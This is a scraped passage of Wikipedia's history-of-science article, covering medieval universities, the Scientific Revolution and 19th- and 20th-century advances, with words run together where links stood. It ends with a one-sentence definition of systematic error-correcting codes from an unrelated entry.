Inclassical antiquity, Greek and Roman taboos had meant that dissection was usually banned, but in the Middle Ages medical teachers and students at Bologna began to open human bodies, andMondino de Luzzi(c.1275–1326) produced the first known anatomy textbook based on human dissection.[167][168]
As a result of thePax Mongolica, Europeans, such asMarco Polo, began to venture further and further east. The written accounts of Polo and his fellow travelers inspired other Western European maritime explorers to search for a direct sea route to Asia, ultimately leading to theAge of Discovery.[169]
Technological advances were also made, such as the early flight ofEilmer of Malmesbury(who had studied mathematics in 11th-century England),[170]and the metallurgical achievements of theCistercianblast furnaceatLaskill.[171][172]
An intellectual revitalization of Western Europe started with the birth ofmedieval universitiesin the 12th century. These urban institutions grew from the informal scholarly activities of learnedfriarswho visitedmonasteries, consultedlibraries, and conversed with other fellow scholars.[173]A friar who became well-known would attract a following of disciples, giving rise to a brotherhood of scholars (orcollegiumin Latin). Acollegiummight travel to a town or request a monastery to host them. However, if the number of scholars within acollegiumgrew too large, they would opt to settle in a town instead.[173]As the number ofcollegiawithin a town grew, thecollegiamight request that their king grant them acharterthat would convert them into auniversitas.[173]Many universities were chartered during this period, with the first inBolognain 1088, followed byParisin 1150,Oxfordin 1167, andCambridgein 1231.[173]The granting of a charter meant that the medieval universities were partially sovereign and independent from local authorities.[173]Their independence allowed them to conduct themselves and judge their own members based on their own rules. Furthermore, as initially religious institutions, their faculties and students were protected from capital punishment (e.g.,gallows).[173]Such independence was a matter of custom, which could, in principle, be revoked by their respective rulers if they felt threatened. Discussions of various subjects or claims at these medieval institutions, no matter how controversial, were done in a formalized way so as to declare such discussions as being within the bounds of a university and therefore protected by the privileges of that institution's sovereignty.[173]A claim could be described asex cathedra(literally "from the chair", used within the context of teaching) orex hypothesi(by hypothesis). This meant that the discussions were presented as purely an intellectual exercise that did not require those involved to commit themselves to the truth of a claim or to proselytize. Modern academic concepts and practices such asacademic freedomor freedom of inquiry are remnants of these medieval privileges that were tolerated in the past.[173]
The curriculum of these medieval institutions centered on theseven liberal arts, which were aimed at providing beginning students with the skills for reasoning and scholarly language.[173]Students would begin their studies starting with the first three liberal arts orTrivium(grammar, rhetoric, and logic) followed by the next four liberal arts orQuadrivium(arithmetic, geometry, astronomy, and music).[173][143]Those who completed these requirements and received theirbaccalaureate(orBachelor of Arts) had the option to join the higher faculty (law, medicine, or theology), which would confer anLLDfor a lawyer, anMDfor a physician, orThDfor a theologian.[173]Students who chose to remain in the lower faculty (arts) could work towards aMagister(orMaster's) degree and would study three philosophies: metaphysics, ethics, and natural philosophy.[173]Latin translationsof Aristotle's works such asDe Anima(On the Soul) and the commentaries on them were required readings. As time passed, the lower faculty was allowed to confer its own doctoral degree called thePhD.[173]Many of the Masters were drawn to encyclopedias and had used them as textbooks. But these scholars yearned for the complete original texts of the Ancient Greek philosophers, mathematicians, and physicians such asAristotle,Euclid, andGalen, which were not available to them at the time. These Ancient Greek texts were to be found in the Byzantine Empire and the Islamic World.[173]
Contact with the Byzantine Empire,[150]and with the Islamic world during theReconquistaand theCrusades, allowed Latin Europe access to scientificGreekandArabictexts, including the works ofAristotle,Ptolemy,Isidore of Miletus,John Philoponus,Jābir ibn Hayyān,al-Khwarizmi,Alhazen,Avicenna, andAverroes. European scholars had access to the translation programs ofRaymond of Toledo, who sponsored the 12th centuryToledo School of Translatorsfrom Arabic to Latin. Later translators likeMichael Scotuswould learn Arabic in order to study these texts directly. The European universities aided materially in thetranslation and propagation of these textsand started a new infrastructure which was needed for scientific communities. In fact, European university put many works about the natural world and the study of nature at the center of its curriculum,[174]with the result that the "medieval university laid far greater emphasis on science than does its modern counterpart and descendent."[175]
At the beginning of the 13th century, there were reasonably accurate Latin translations of the main works of almost all the intellectually crucial ancient authors, allowing a sound transfer of scientific ideas via both the universities and the monasteries. By then, the natural philosophy in these texts began to be extended byscholasticssuch asRobert Grosseteste,Roger Bacon,Albertus MagnusandDuns Scotus. Precursors of the modern scientific method, influenced by earlier contributions of the Islamic world, can be seen already in Grosseteste's emphasis on mathematics as a way to understand nature, and in the empirical approach admired by Bacon, particularly in hisOpus Majus.Pierre Duhem's thesis is thatStephen Tempier– the Bishop of Paris –Condemnation of 1277led to the study of medieval science as a serious discipline, "but no one in the field any longer endorses his view that modern science started in 1277".[176]However, many scholars agree with Duhem's view that the mid-late Middle Ages saw important scientific developments.[177][178][179]
The first half of the 14th century saw much important scientific work, largely within the framework ofscholasticcommentaries on Aristotle's scientific writings.[180]William of Ockhamemphasized the principle ofparsimony: natural philosophers should not postulate unnecessary entities, so that motion is not a distinct thing but is only the moving object[181]and an intermediary "sensible species" is not needed to transmit an image of an object to the eye.[182]Scholars such asJean BuridanandNicole Oresmestarted to reinterpret elements of Aristotle's mechanics. In particular, Buridan developed the theory that impetus was the cause of the motion of projectiles, which was a first step towards the modern concept ofinertia.[183]TheOxford Calculatorsbegan to mathematically analyze thekinematicsof motion, making this analysis without considering the causes of motion.[184]
In 1348, theBlack Deathand other disasters sealed a sudden end to philosophic and scientific development. Yet, the rediscovery of ancient texts was stimulated by theFall of Constantinoplein 1453, when many Byzantine scholars sought refuge in the West. Meanwhile, the introduction of printing was to have great effect on European society. The facilitated dissemination of the printed word democratized learning and allowed ideas such asalgebrato propagate more rapidly. These developments paved the way for theScientific Revolution, where scientific inquiry, halted at the start of the Black Death, resumed.[185][186]
The renewal of learning in Europe began with 12th centuryScholasticism. TheNorthern Renaissanceshowed a decisive shift in focus from Aristotelian natural philosophy to chemistry and the biological sciences (botany, anatomy, and medicine).[187]Thus modern science in Europe was resumed in a period of great upheaval: the ProtestantReformationandCatholicCounter-Reformation; the discovery of the Americas byChristopher Columbus; theFall of Constantinople; but also the re-discovery of Aristotle during the Scholastic period presaged large social and political changes. Thus, a suitable environment was created in which it became possible to question scientific doctrine, in much the same way thatMartin LutherandJohn Calvinquestioned religious doctrine. The works of Ptolemy (astronomy) and Galen (medicine) were found not always to match everyday observations. Work byVesaliuson human cadavers found problems with the Galenic view of anatomy.[188]
The discovery ofCristallocontributed to the advancement of science in the period as well with its appearance out of Venice around 1450. The new glass allowed for better spectacles and eventually to the inventions of thetelescopeandmicroscope.
Theophrastus' work on rocks,Peri lithōn, remained authoritative for millennia: its interpretation of fossils was not overturned until after the Scientific Revolution.
During theItalian Renaissance,Niccolò Machiavelliestablished the emphasis of modern political science on directempiricalobservationof politicalinstitutionsand actors. Later, the expansion of the scientific paradigm during theEnlightenmentfurther pushed the study of politics beyond normative determinations.[189]In particular, the study ofstatistics, to study the subjects of thestate, has been applied topollingandvoting.
In archaeology, the 15th and 16th centuries saw the rise ofantiquariansinRenaissance Europewho were interested in the collection of artifacts.
Theearly modern periodis seen as a flowering of the European Renaissance. There was a willingness to question previously held truths and search for new answers. This resulted in a period of major scientific advancements, now known as theScientific Revolution, which led to the emergence of a New Science that was moremechanisticin its worldview, more integrated with mathematics, and more reliable and open as its knowledge was based on a newly definedscientific method.[12][15][16][190]The Scientific Revolution is a convenient boundary between ancient thought and classical physics, and is traditionally held to have begun in 1543, when the booksDe humani corporis fabrica(On the Workings of the Human Body) byAndreas Vesalius, and alsoDe Revolutionibus, by the astronomerNicolaus Copernicus, were first printed. The period culminated with the publication of thePhilosophiæ Naturalis Principia Mathematicain 1687 byIsaac Newton, representative of the unprecedented growth ofscientific publicationsthroughout Europe.
Other significant scientific advances were made during this time byGalileo Galilei,Johannes Kepler,Edmond Halley,William Harvey,Pierre Fermat,Robert Hooke,Christiaan Huygens,Tycho Brahe,Marin Mersenne,Gottfried Leibniz,Isaac Newton, andBlaise Pascal.[191]In philosophy, major contributions were made byFrancis Bacon, SirThomas Browne,René Descartes,Baruch Spinoza,Pierre Gassendi,Robert Boyle, andThomas Hobbes.[191]Christiaan Huygensderived the centripetal and centrifugal forces and was the first to transfer mathematical inquiry to describe unobservable physical phenomena.William Gilbertdid some of the earliest experiments with electricity and magnetism, establishing that the Earth itself is magnetic.
Theheliocentricastronomical model of the universe was refined byNicolaus Copernicus. Copernicus proposed the idea that the Earth and all heavenly spheres, containing the planets and other objects in the cosmos, rotated around the Sun.[192]His heliocentric model also proposed that all stars were fixed and did not rotate on an axis, nor in any motion at all.[193]His theory proposed the yearly rotation of the Earth and the other heavenly spheres around the Sun and was able to calculate the distances of planets using deferents and epicycles. Although these calculations were not completely accurate, Copernicus was able to understand the distance order of each heavenly sphere. The Copernican heliocentric system was a revival of the hypotheses ofAristarchus of SamosandSeleucus of Seleucia.[194]Aristarchus of Samos did propose that the Earth rotated around the Sun but did not mention anything about the other heavenly spheres' order, motion, or rotation.[195]Seleucus of Seleucia also proposed the rotation of the Earth around the Sun but did not mention anything about the other heavenly spheres. In addition, Seleucus of Seleucia understood that the Moon rotated around the Earth and could be used to explain the tides of the oceans, thus further proving his understanding of the heliocentric idea.[196]
The Scientific Revolution continued into theAge of Enlightenment, which accelerated the development of modern science.
The heliocentric model revived byNicolaus Copernicuswas followed by the model of planetary motion given byJohannes Keplerin the early 17th century, which proposed that the planets followellipticalorbits, with the Sun at one focus of the ellipse. InAstronomia Nova(A New Astronomy), the first two of thelaws of planetary motionwere shown by the analysis of the orbit of Mars. Kepler introduced the revolutionary concept of planetary orbit. Because of his work astronomical phenomena came to be seen as being governed by physical laws.[200]
A decisive moment came when "chemistry" was distinguished fromalchemybyRobert Boylein his workThe Sceptical Chymist, in 1661; although the alchemical tradition continued for some time after his work. Other important steps included the gravimetric experimental practices of medical chemists likeWilliam Cullen,Joseph Black,Torbern BergmanandPierre Macquerand through the work ofAntoine Lavoisier("father of modern chemistry") onoxygenand the law ofconservation of mass, which refutedphlogiston theory. Modern chemistry emerged from the sixteenth through the eighteenth centuries through the material practices and theories promoted by alchemy, medicine, manufacturing and mining.[201][202][203]
In 1687, Isaac Newton published thePrincipia Mathematica, detailing two comprehensive and successful physical theories:Newton's laws of motion, which led to classical mechanics; andNewton's law of universal gravitation, which describes the fundamental force of gravity.
William HarveypublishedDe Motu Cordisin 1628, which revealed his conclusions based on his extensive studies ofvertebratecirculatory systems.[191]He identified the central role of theheart,arteries, andveinsin producing blood movement in a circuit, and failed to find any confirmation ofGalen's pre-existing notions of heating and cooling functions.[204]The history of early modern biology and medicine is often told through the search for the seat of the soul.[205]Galen in his descriptions of his foundational work in medicine presents the distinctions between arteries, veins, and nerves using the vocabulary of the soul.[206]
A critical innovation was the creation of permanent scientific societies and their scholarly journals, which dramatically sped the diffusion of new ideas. Typical was the founding of theRoyal Societyin London in 1660 and its journal in 1665 thePhilosophical Transaction of the Royal Society, the first scientific journal in English.[207]1665 also saw the first journal in French, theJournal dessçavans. Science drawing on the works[208]ofNewton,Descartes,PascalandLeibniz, science was on a path to modernmathematics,physicsandtechnologyby the time of the generation ofBenjamin Franklin(1706–1790),Leonhard Euler(1707–1783),Mikhail Lomonosov(1711–1765) andJean le Rond d'Alembert(1717–1783).Denis Diderot'sEncyclopédie, published between 1751 and 1772 brought this new understanding to a wider audience. The impact of this process was not limited to science and technology, but affectedphilosophy(Immanuel Kant,David Hume),religion(the increasingly significant impact ofscience upon religion), and society and politics in general (Adam Smith,Voltaire).
Geology did not undergo systematic restructuring during theScientific Revolutionbut instead existed as a cloud of isolated, disconnected ideas about rocks, minerals, and landforms long before it became a coherent science.Robert Hookeformulated a theory of earthquakes, andNicholas Stenodeveloped the theory ofsuperpositionand argued thatfossilswere the remains of once-living creatures. Beginning withThomas Burnet'sSacred Theory of the Earthin 1681, natural philosophers began to explore the idea that the Earth had changed over time. Burnet and his contemporaries interpreted Earth's past in terms of events described in the Bible, but their work laid the intellectual foundations for secular interpretations of Earth history.
During the late 18th century, researchers such asHugh Williamson[209]andJohn Walshexperimented on the effects of electricity on the human body. Further studies byLuigi GalvaniandAlessandro Voltaestablished the electrical nature of what Volta calledgalvanism.[210][211]
Modern geology, like modern chemistry, gradually evolved during the 18th and early 19th centuries.Benoît de Mailletand theComte de Buffonsaw the Earth as much older than the 6,000 years envisioned by biblical scholars.Jean-Étienne GuettardandNicolas Desmaresthiked central France and recorded their observations on some of the first geological maps. Aided by chemical experimentation, naturalists such as Scotland'sJohn Walker,[212]Sweden's Torbern Bergman, and Germany'sAbraham Wernercreated comprehensive classification systems for rocks and minerals—a collective achievement that transformed geology into a cutting edge field by the end of the eighteenth century. These early geologists also proposed a generalized interpretations of Earth history that ledJames Hutton,Georges CuvierandAlexandre Brongniart, following in the steps ofSteno, to argue that layers of rock could be dated by the fossils they contained: a principle first applied to the geology of the Paris Basin. The use ofindex fossilsbecame a powerful tool for making geological maps, because it allowed geologists to correlate the rocks in one locality with those of similar age in other, distant localities.
The basis forclassical economicsformsAdam Smith'sAn Inquiry into the Nature and Causes of the Wealth of Nations, published in 1776. Smith criticizedmercantilism, advocating a system of free trade withdivision of labour. He postulated an "invisible hand" that regulated economic systems made up of actors guided only by self-interest. The "invisible hand" mentioned in a lost page in the middle of a chapter in the middle of the "Wealth of Nations", 1776, advances as Smith's central message.
Anthropology can best be understood as an outgrowth of the Age of Enlightenment. It was during this period that Europeans attempted systematically to study human behavior. Traditions of jurisprudence, history, philology and sociology developed during this time and informed the development of the social sciences of which anthropology was a part.
The 19th century saw the birth of science as a profession.William Whewellhad coined the termscientistin 1833,[213]which soon replaced the older termnatural philosopher.
In physics, the behavior of electricity and magnetism was studied byGiovanni Aldini,Alessandro Volta,Michael Faraday,Georg Ohm, and others. The experiments, theories and discoveries ofMichael Faraday,Andre-Marie Ampere,James Clerk Maxwell, and their contemporaries led to the unification of the two phenomena into a single theory ofelectromagnetismas described byMaxwell's equations.Thermodynamicsled to an understanding of heat and the notion of energy being defined.
In astronomy, the planet Neptune was discovered. Advances in astronomy and in optical systems in the 19th century resulted in the first observation of anasteroid(1 Ceres) in 1801, and the discovery ofNeptunein 1846.
In mathematics, the notion of complex numbers finally matured and led to a subsequent analytical theory; they also began the use ofhypercomplex numbers.Karl Weierstrassand others carried out thearithmetization of analysisfor functions ofrealandcomplex variables. It also saw rise tonew progress in geometrybeyond those classical theories of Euclid, after a period of nearly two thousand years. The mathematical science of logic likewise had revolutionary breakthroughs after a similarly long period of stagnation. But the most important step in science at this time were the ideas formulated by the creators of electrical science. Their work changed the face of physics and made possible for new technology to come about such as electric power, electrical telegraphy, the telephone, and radio.
In chemistry,Dmitri Mendeleev, following theatomic theoryofJohn Dalton, created the firstperiodic tableofelements. Other highlights include the discoveries unveiling the nature of atomic structure and matter, simultaneously with chemistry – and of new kinds of radiation. The theory that all matter is made of atoms, which are the smallest constituents of matter that cannot be broken down without losing the basic chemical and physical properties of that matter, was provided byJohn Daltonin 1803, although the question took a hundred years to settle as proven. Dalton also formulated the law of mass relationships. In 1869,Dmitri Mendeleevcomposed hisperiodic tableof elements on the basis of Dalton's discoveries. The synthesis ofureabyFriedrich Wöhleropened a new research field,organic chemistry, and by the end of the 19th century, scientists were able to synthesize hundreds of organic compounds. The later part of the 19th century saw the exploitation of the Earth's petrochemicals, after the exhaustion of the oil supply fromwhaling. By the 20th century, systematic production of refined materials provided a ready supply of products which provided not only energy, but also synthetic materials for clothing, medicine, and everyday disposable resources. Application of the techniques of organic chemistry to living organisms resulted inphysiological chemistry, the precursor tobiochemistry.[214]
Over the first half of the 19th century, geologists such asCharles Lyell,Adam Sedgwick, andRoderick Murchisonapplied the new technique to rocks throughout Europe and eastern North America, setting the stage for more detailed, government-funded mapping projects in later decades. Midway through the 19th century, the focus of geology shifted from description and classification to attempts to understandhowthe surface of the Earth had changed. The first comprehensive theories of mountain building were proposed during this period, as were the first modern theories of earthquakes and volcanoes.Louis Agassizand others established the reality of continent-coveringice ages, and "fluvialists" likeAndrew Crombie Ramsayargued that river valleys were formed, over millions of years by the rivers that flow through them. After the discovery ofradioactivity,radiometric datingmethods were developed, starting in the 20th century.Alfred Wegener's theory of "continental drift" was widely dismissed when he proposed it in the 1910s,[215]but new data gathered in the 1950s and 1960s led to the theory ofplate tectonics, which provided a plausible mechanism for it. Plate tectonics also provided a unified explanation for a wide range of seemingly unrelated geological phenomena. Since the 1960s it has served as the unifying principle in geology.[216]
Perhaps the most prominent, controversial, and far-reaching theory in all of science has been the theory ofevolutionbynatural selection, which was independently formulated byCharles DarwinandAlfred Wallace. It was described in detail in Darwin's bookThe Origin of Species, which was published in 1859. In it, Darwin proposed that the features of all living things, including humans, were shaped by natural processes over long periods of time. The theory of evolution in its current form affects almost all areas of biology.[217]Implications of evolution on fields outside of pure science have led to bothopposition and supportfrom different parts of society, and profoundly influenced the popular understanding of "man's place in the universe". Separately,Gregor Mendelformulated the principles of inheritance in 1866, which became the basis of moderngenetics.
Another important landmark in medicine and biology were the successful efforts to prove thegerm theory of disease. Following this,Louis Pasteurmade the firstvaccineagainstrabies, and also made many discoveries in the field of chemistry, including theasymmetry of crystals. In 1847, Hungarian physicianIgnác Fülöp Semmelweisdramatically reduced the occurrence ofpuerperal feverby simply requiring physicians to wash their hands before attending to women in childbirth. This discovery predated thegerm theory of disease. However, Semmelweis' findings were not appreciated by his contemporaries and handwashing came into use only with discoveries by British surgeonJoseph Lister, who in 1865 proved the principles ofantisepsis. Lister's work was based on the important findings by French biologistLouis Pasteur. Pasteur was able to link microorganisms with disease, revolutionizing medicine. He also devised one of the most important methods inpreventive medicine, when in 1880 he produced avaccineagainstrabies. Pasteur invented the process ofpasteurization, to help prevent the spread of disease through milk and other foods.[218]
Karl Marxdeveloped an alternative economic theory, calledMarxian economics. Marxian economics is based on thelabor theory of valueand assumes the value of good to be based on the amount of labor required to produce it. Under this axiom,capitalismwas based on employers not paying the full value of workers labor to create profit. TheAustrian Schoolresponded to Marxian economics by viewingentrepreneurshipas driving force of economic development. This replaced the labor theory of value by a system ofsupply and demand.
Psychology as a scientific enterprise that was independent from philosophy began in 1879 whenWilhelm Wundtfounded the first laboratory dedicated exclusively to psychological research (inLeipzig). Other important early contributors to the field includeHermann Ebbinghaus(a pioneer in memory studies),Ivan Pavlov(who discoveredclassical conditioning),William James, andSigmund Freud. Freud's influence has been enormous, though more as cultural icon than a force in scientific psychology.[citation needed]
Modern sociology emerged in the early 19th century as the academic response to the modernization of the world. Among many early sociologists (e.g.,Émile Durkheim), the aim of sociology was instructuralism, understanding the cohesion of social groups, and developing an "antidote" to social disintegration.Max Weberwas concerned with the modernization of society through the concept ofrationalization, which he believed would trap individuals in an "iron cage" of rational thought. Some sociologists, includingGeorg SimmelandW. E. B. Du Bois, used moremicrosociological, qualitative analyses. This microlevel approach played an important role in American sociology, with the theories ofGeorge Herbert Meadand his studentHerbert Blumerresulting in the creation of thesymbolic interactionismapproach to sociology. In particular, just Auguste Comte, illustrated with his work the transition from a theological to a metaphysical stage and, from this, to a positive stage. Comte took care of the classification of the sciences as well as a transit of humanity towards a situation of progress attributable to a re-examination of nature according to the affirmation of 'sociality' as the basis of the scientifically interpreted society.[219]
TheRomantic Movementof the early 19th century reshaped science by opening up new pursuits unexpected in the classical approaches of the Enlightenment. The decline of Romanticism occurred because a new movement,Positivism, began to take hold of the ideals of the intellectuals after 1840 and lasted until about 1880. At the same time, the romantic reaction to the Enlightenment produced thinkers such asJohann Gottfried Herderand laterWilhelm Diltheywhose work formed the basis for thecultureconcept which is central to the discipline. Traditionally, much of the history of the subject was based oncolonialencounters between Western Europe and the rest of the world, and much of 18th- and 19th-century anthropology is now classed asscientific racism. During the late 19th century, battles over the "study of man" took place between those of an "anthropological" persuasion (relying onanthropometricaltechniques) and those of an "ethnological" persuasion (looking at cultures and traditions), and these distinctions became part of the later divide betweenphysical anthropologyandcultural anthropology, the latter ushered in by the students ofFranz Boas.
Science advanced dramatically during the 20th century. There were new and radical developments in thephysicalandlifesciences, building on the progress from the 19th century.[220]
The beginning of the 20th century brought the start of a revolution in physics. The long-held theories of Newton were shown not to be correct in all circumstances. Beginning in 1900,Max Planck,Albert Einstein,Niels Bohrand others developed quantum theories to explain various anomalous experimental results, by introducing discrete energy levels. Not only didquantum mechanicsshow that the laws of motion did not hold on small scales, but the theory ofgeneral relativity, proposed by Einstein in 1915, showed that the fixed background ofspacetime, on which bothNewtonian mechanicsandspecial relativitydepended, could not exist. In 1925,Werner HeisenbergandErwin Schrödingerformulatedquantum mechanics, which explained the preceding quantum theories. Currently, general relativity and quantum mechanics are inconsistent with each other, and efforts are underway to unify the two.[221]
The observation byEdwin Hubblein 1929 that the speed at which galaxies recede positively correlates with their distance, led to the understanding that the universe is expanding, and the formulation of theBig Bangtheory byGeorges Lemaître.George Gamow,Ralph Alpher, andRobert Hermanhad calculated that there should be evidence for aBig Bangin the background temperature of the universe.[222]In 1964,Arno PenziasandRobert Wilson[223]discovered a 3 Kelvin background hiss in theirBell Labsradiotelescope(theHolmdel Horn Antenna), which was evidence for this hypothesis, and formed the basis for a number of results that helped determine theage of the universe.
In 1938Otto HahnandFritz Strassmanndiscovered nuclear fissionwith radiochemical methods, and in 1939Lise MeitnerandOtto Robert Frischwrote the first theoretical interpretation of the fission process, which was later improved byNiels BohrandJohn A. Wheeler. Further developments took place during World War II, which led to the practical application ofradarand the development and use of theatomic bomb. Around this time,Chien-Shiung Wuwas recruited by theManhattan Projectto help develop a process for separating uranium metal into U-235 and U-238 isotopes byGaseous diffusion.[224]She was an expert experimentalist in beta decay and weak interaction physics.[225][226]Wu designed an experiment (seeWu experiment) that enabled theoretical physicistsTsung-Dao LeeandChen-Ning Yangto disprove the law of parity experimentally, winning them a Nobel Prize in 1957.[225]
Though the process had begun with the invention of thecyclotronbyErnest O. Lawrencein the 1930s, physics in the postwar period entered into a phase of what historians have called "Big Science", requiring massive machines, budgets, and laboratories in order to test their theories and move into new frontiers. The primary patron of physics became state governments, who recognized that the support of "basic" research could often lead to technologies useful to both military and industrial applications.
In the early 20th century, the study of heredity became a major investigation after the rediscovery in 1900 of the laws of inheritance developed byMendel.[227]The 20th century also saw the integration of physics and chemistry, with chemical properties explained as the result of the electronic structure of the atom.Linus Pauling's book onThe Nature of the Chemical Bondused the principles of quantum mechanics to deducebond anglesin ever-more complicated molecules. Pauling's work culminated in the physical modelling ofDNA,the secret of life(in the words ofFrancis Crick, 1953). In the same year, theMiller–Urey experimentdemonstrated in a simulation of primordial processes, that basic constituents of proteins, simpleamino acids, could themselves be built up from simpler molecules, kickstarting decades of research into thechemical origins of life. By 1953,James D. WatsonandFrancis Crickclarified the basic structure of DNA, thegenetic materialfor expressing life in all its forms,[228]building on the work ofMaurice WilkinsandRosalind Franklin, suggested that the structure of DNA was a double helix. In their famous paper "Molecular structure of Nucleic Acids"[228]In the late 20th century, the possibilities ofgenetic engineeringbecame practical for the first time, and a massive international effort began in 1990 to map out an entire humangenome(theHuman Genome Project). The discipline ofecologytypically traces its origin to the synthesis ofDarwinian evolutionandHumboldtianbiogeography, in the late 19th and early 20th centuries.[229]Equally important in the rise of ecology, however, weremicrobiologyandsoil science—particularly thecycle of lifeconcept, prominent in the work ofLouis PasteurandFerdinand Cohn.[230]The wordecologywas coined byErnst Haeckel, whose particularly holistic view of nature in general (and Darwin's theory in particular) was important in the spread of ecological thinking.[231]The field ofecosystem ecologyemerged in the Atomic Age with the use of radioisotopes to visualize food webs and by the 1970s ecosystem ecology deeply influenced global environmental management.[232]
In 1925,Cecilia Payne-Gaposchkindetermined that stars were composed mostly of hydrogen and helium.[233]She was dissuaded by astronomerHenry Norris Russellfrom publishing this finding in her PhD thesis because of the widely held belief that stars had the same composition as the Earth.[234]However, four years later, in 1929,Henry Norris Russellcame to the same conclusion through different reasoning and the discovery was eventually accepted.[234]
In 1987, supernovaSN 1987Awas observed by astronomers on Earth both visually, and in a triumph forneutrino astronomy, by the solar neutrino detectors atKamiokande. But the solar neutrino flux wasa fraction of its theoretically expected value. This discrepancy forced a change in some values in thestandard modelforparticle physics.
The understanding of neurons and the nervous system became increasingly precise and molecular during the 20th century. For example, in 1952,Alan Lloyd HodgkinandAndrew Huxleypresented a mathematical model for transmission of electrical signals in neurons of the giant axon of a squid, which they called "action potentials", and how they are initiated and propagated, known as theHodgkin–Huxley model. In 1961–1962, Richard FitzHugh and J. Nagumo simplified Hodgkin–Huxley, in what is called theFitzHugh–Nagumo model. In 1962,Bernard Katzmodeledneurotransmissionacross the space between neurons known assynapses. Beginning in 1966, Eric Kandel and collaborators examined biochemical changes in neurons associated with learning and memory storage inAplysia. In 1981 Catherine Morris and Harold Lecar combined these models in theMorris–Lecar model. Such increasingly quantitative work gave rise to numerousbiological neuron modelsandmodels of neural computation.Neurosciencebegan to be recognized as a distinct academic discipline in its own right.Eric Kandeland collaborators have citedDavid Rioch,Francis O. Schmitt, andStephen Kuffleras having played critical roles in establishing the field.[235]
Geologists' embrace ofplate tectonicsbecame part of a broadening of the field from a study of rocks into a study of the Earth as a planet. Other elements of this transformation include:geophysical studiesof the interior of the Earth, the grouping of geology withmeteorologyandoceanographyas one of the "earth sciences", and comparisons of Earth and the solar system's other rocky planets.
In terms of applications, a massive number of new technologies were developed in the 20th century. Technologies such aselectricity, theincandescent light bulb, theautomobileand thephonograph, first developed at the end of the 19th century, were perfected and universally deployed. The first car was introduced by Karl Benz in 1885.[236]The firstairplaneflight occurred in 1903, and by the end of the centuryairlinersflew thousands of miles in a matter of hours. The development of theradio,televisionandcomputerscaused massive changes in the dissemination of information. Advances in biology also led to large increases in food production, as well as the elimination of diseases such aspoliobyDr. Jonas Salk. Gene mapping and gene sequencing, invented by Drs. Mark Skolnik and Walter Gilbert, respectively, are the two technologies that made theHuman Genome Projectfeasible. Computer science, built upon a foundation oftheoretical linguistics,discrete mathematics, andelectrical engineering, studies the nature and limits of computation. Subfields includecomputability,computational complexity,databasedesign,computer networking, artificial intelligence, and the design ofcomputer hardware. One area in which advances in computing have contributed to more general scientific development is by facilitating large-scalearchiving of scientific data. Contemporary computer science typically distinguishes itself by emphasizing mathematical 'theory' in contrast to the practical emphasis ofsoftware engineering.[237]
Einstein's paper "On the Quantum Theory of Radiation" outlined the principles of the stimulated emission of photons. This led to the invention of theLaser(light amplification by the stimulated emission of radiation) and theoptical amplifierwhich ushered in theInformation Age.[238]It is optical amplification that allowsfiber optic networksto transmit the massive capacity of theInternet.
Based on wireless transmission of electromagnetic radiation and global networks of cellular operation, the mobile phone became a primary means to access the internet.[239]
In political science during the 20th century, the study of ideology, behaviouralism and international relations led to a multitude of 'pol-sci' subdisciplines includingrational choice theory,voting theory,game theory(also used in economics),psephology,political geography/geopolitics,political anthropology/political psychology/political sociology, political economy,policy analysis, public administration, comparative political analysis andpeace studies/conflict analysis. In economics,John Maynard Keynesprompted a division betweenmicroeconomicsandmacroeconomicsin the 1920s. UnderKeynesian economicsmacroeconomic trends can overwhelm economic choices made by individuals. Governments should promoteaggregate demandfor goods as a means to encourage economic expansion. Following World War II,Milton Friedmancreated the concept ofmonetarism. Monetarism focuses on using the supply and demand of money as a method for controlling economic activity. In the 1970s, monetarism has adapted intosupply-side economicswhich advocates reducing taxes as a means to increase the amount of money available for economic expansion. Other modern schools of economic thought areNew Classical economicsandNew Keynesian economics. New Classical economics was developed in the 1970s, emphasizing solid microeconomics as the basis for macroeconomic growth. New Keynesian economics was created partially in response to New Classical economics. It shows how imperfect competition and market rigidities, means monetary policy has real effects, and enables analysis of different policies.[240]
Psychology in the 20th century saw a rejection of Freud's theories as being too unscientific, and a reaction againstEdward Titchener's atomistic approach of the mind. This led to the formulation ofbehaviorismbyJohn B. Watson, which was popularized byB.F. Skinner. Behaviorism proposedepistemologicallylimiting psychological study to overt behavior, since that could be reliably measured. Scientific knowledge of the "mind" was considered too metaphysical, hence impossible to achieve. The final decades of the 20th century have seen the rise ofcognitive science, which considers the mind as once again a subject for investigation, using the tools of psychology,linguistics,computer science, philosophy, andneurobiology. New methods of visualizing the activity of the brain, such asPET scansandCAT scans, began to exert their influence as well, leading some researchers to investigate the mind by investigating the brain, rather than cognition. These new forms of investigation assume that a wide understanding of the human mind is possible, and that such an understanding may be applied to other research domains, such asartificial intelligence. Evolutionary theory was applied to behavior and introduced to anthropology and psychology, through the works ofcultural anthropologistNapoleon Chagnon. Physical anthropology would becomebiological anthropology, incorporating elements of evolutionary biology.[241]
American sociology in the 1940s and 1950s was dominated largely byTalcott Parsons, who argued that aspects of society that promoted structural integration were therefore "functional". This structural functionalism approach was questioned in the 1960s, when sociologists came to see this approach as merely a justification for inequalities present in the status quo. In reaction,conflict theorywas developed, which was based in part on the philosophies of Karl Marx. Conflict theorists saw society as an arena in which different groups compete for control over resources. Symbolic interactionism also came to be regarded as central to sociological thinking.Erving Goffmansaw social interactions as a stage performance, with individuals preparing "backstage" and attempting to control their audience throughimpression management.[242]While these theories are currently prominent in sociological thought, other approaches exist, includingfeminist theory,post-structuralism, rational choice theory, andpostmodernism.
In the mid-20th century, much of the methodologies of earlier anthropological and ethnographical study were reevaluated with an eye towards research ethics, while at the same time the scope of investigation has broadened far beyond the traditional study of "primitive cultures".
In the early 21st century, some concepts that originated in 20th century physics were proven. On 4 July 2012, physicists working at CERN'sLarge Hadron Colliderannounced that they had discovered a new subatomic particle greatly resembling theHiggs boson,[243]confirmed as such by the following March.[244]Gravitational waveswere firstdetectedon 14 September 2015.[245]
The Human Genome Project was declared complete in 2003.[246]TheCRISPR gene editing techniquedeveloped in 2012 allowed scientists to precisely and easily modify DNA and led to the development of new medicine.[247]In 2020,xenobots, a new class of living robotics, were invented;[248]reproductive capabilities were introduced the following year.[249]
Positive psychologyis a branch of psychology founded in 1998 byMartin Seligmanthat is concerned with the study of happiness, mental well-being, and positive human functioning, and is a reaction to 20th century psychology's emphasis on mental illness and dysfunction.[250]
|
https://en.wikipedia.org/wiki/History_of_science
|
Incoding theory, asystematic codeis anyerror-correcting codein which the input data are embedded in the encoded output. Conversely, in anon-systematic codethe output does not contain the input symbols.
